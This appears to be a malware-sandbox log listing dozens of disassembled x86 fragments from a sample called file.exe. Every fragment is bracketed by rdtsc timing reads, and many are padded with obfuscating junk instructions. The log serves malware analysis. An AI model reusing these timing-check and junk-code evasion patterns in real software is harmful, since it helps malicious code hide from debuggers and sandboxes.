Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E3507 second address: 17E3523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FC69CFD56E6h 0x00000014 pop edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825A58 second address: 1825A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC69D5338F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825A62 second address: 1825A93 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC69CFD56E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FC69CFD56EEh 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC69CFD56EAh 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825A93 second address: 1825A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825A97 second address: 1825AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CFD56EDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825AAE second address: 1825ACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC69D533904h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825ACD second address: 1825AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826C66 second address: 1826D01 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007FC69D5338F6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FC69D5338F8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+122D3C31h] 0x0000002f push 00000000h 0x00000031 add dword ptr [ebp+122D1BEFh], ebx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007FC69D5338F8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov ebx, dword ptr [ebp+122D3B7Dh] 0x00000059 mov dword ptr [ebp+1245AF4Ch], ebx 0x0000005f xchg eax, esi 0x00000060 jng 00007FC69D533910h 0x00000066 jg 00007FC69D53390Ah 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 pushad 0x00000071 popad 0x00000072 pop eax 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826D01 second address: 1826D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826D07 second address: 1826D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1828CAC second address: 1828CC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1828CC0 second address: 1828CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC69D5338F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826EA1 second address: 1826EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC69CFD56F1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182ACAA second address: 182AD2D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC69D5338F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jg 00007FC69D533906h 0x00000012 nop 0x00000013 mov edi, dword ptr [ebp+122D3B41h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FC69D5338F8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov di, si 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FC69D5338F8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 mov ebx, 784F16DAh 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jg 00007FC69D5338F8h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182AD2D second address: 182AD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56EAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182AE81 second address: 182AE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC69D5338F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182AE8C second address: 182AE92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182AE92 second address: 182AE96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182CD94 second address: 182CD9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D78D7 second address: 17D78F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533909h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182CD9A second address: 182CDA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D78F4 second address: 17D7931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC69D533903h 0x0000000b jno 00007FC69D5338FCh 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FC69D533900h 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D7931 second address: 17D7935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D7935 second address: 17D793B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182F337 second address: 182F33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182F5BF second address: 182F5D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69D5338FDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D93D5 second address: 17D93F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 jmp 00007FC69CFD56EBh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18360D3 second address: 18360D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18360D9 second address: 18360DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18391C3 second address: 18391E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FC69D5338F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183A182 second address: 183A186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183A186 second address: 183A1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FC69D5338F8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 xor dword ptr [ebp+12469645h], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FC69D5338F8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 jmp 00007FC69D5338FDh 0x0000004e push eax 0x0000004f js 00007FC69D533904h 0x00000055 push eax 0x00000056 push edx 0x00000057 push edi 0x00000058 pop edi 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1830770 second address: 1830777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1830834 second address: 1830853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533903h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FC69D5338F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1830853 second address: 1830878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007FC69CFD56F9h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1836274 second address: 183627E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC69D5338F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183627E second address: 1836282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1836282 second address: 1836291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1836291 second address: 1836297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1836297 second address: 183629D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18372B4 second address: 18372C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18372C3 second address: 18372C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DE40D second address: 17DE428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC69CFD56F2h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184311E second address: 1843122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1843122 second address: 184312B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184312B second address: 1843131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1843131 second address: 1843139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1843139 second address: 184313F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1843293 second address: 1843297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846DF7 second address: 1846E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC69D5338F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846E0D second address: 1846E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC69CFD56E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846E1D second address: 1846E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC69D533909h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846E40 second address: 1846E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846E46 second address: 1846E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846E4A second address: 1846E64 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC69CFD56E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FC69CFD56E8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184702E second address: 1847055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533905h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e je 00007FC69D533904h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184DC6C second address: 184DC96 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FC69CFD56E6h 0x00000009 pop ecx 0x0000000a push edx 0x0000000b jl 00007FC69CFD56E6h 0x00000011 pop edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007FC69CFD56EAh 0x0000001c push edi 0x0000001d pop edi 0x0000001e push esi 0x0000001f pop esi 0x00000020 jnl 00007FC69CFD56EAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184C90A second address: 184C910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184CF08 second address: 184CF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184CF0C second address: 184CF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC69D5338FAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D069 second address: 184D06F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D06F second address: 184D08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC69D533904h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D08C second address: 184D091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E1A3B second address: 17E1A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D527 second address: 184D569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F9h 0x00000007 je 00007FC69CFD56ECh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC69CFD56F7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D822 second address: 184D84E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC69D5338FEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FC69D533908h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D84E second address: 184D854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D854 second address: 184D85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D970 second address: 184D9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edi 0x00000008 pushad 0x00000009 jns 00007FC69CFD56F5h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC69CFD56F5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184DAF4 second address: 184DAFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184DAFA second address: 184DB10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FC69CFD56E6h 0x00000009 jg 00007FC69CFD56E6h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184DB10 second address: 184DB1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1854453 second address: 1854479 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC69CFD56ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC69CFD56F0h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1854479 second address: 185449C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a pushad 0x0000000b jp 00007FC69D5338F6h 0x00000011 jmp 00007FC69D533900h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18533AE second address: 18533B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18534F9 second address: 18534FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18534FE second address: 1853513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CFD56EFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1853513 second address: 185351B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1853660 second address: 185366C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FC69CFD56E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185366C second address: 1853689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69D533909h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1803808 second address: 1803823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC69CFD56F0h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1803823 second address: 1803836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69D5338FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18542CB second address: 185430C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC69CFD56E8h 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FC69CFD5700h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FC69CFD56ECh 0x00000018 js 00007FC69CFD56ECh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185430C second address: 1854314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1854314 second address: 185431A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CA490 second address: 18CA4C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533902h 0x00000007 jmp 00007FC69D533908h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CEF3F second address: 18CEF62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC69CFD56F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CEF62 second address: 18CEF6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC69D5338F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
